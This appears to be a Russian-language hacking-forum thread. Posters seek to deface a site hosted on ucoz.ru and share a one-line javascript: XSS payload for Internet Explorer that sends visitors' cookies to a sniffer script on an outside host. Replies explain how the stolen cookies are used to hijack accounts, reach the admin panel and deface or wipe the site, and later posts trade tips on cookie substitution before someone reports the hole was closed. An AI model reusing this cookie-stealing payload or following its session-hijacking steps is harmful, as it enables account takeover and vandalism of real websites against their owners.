Просто была необходимость задефейсить один сайтик на укоз.ру

javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie

Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт.

Спасибо огромное. Всё работает!
Кстати, никто не знает...каким образом шифруется там пароль...
p.s. Только в админку попасть вроде как нельзя. т.к. приходят куки от форума(сайта), но не от аккакунта. А это два разных пасса.
Либо я чего - то не понимаю?

При замене своих кук полученными,не заходит Админом :(

Заходит, но только на форум(у меня покрайне мере так ?
А что менял? Какие значения?

Багу прикрыли :(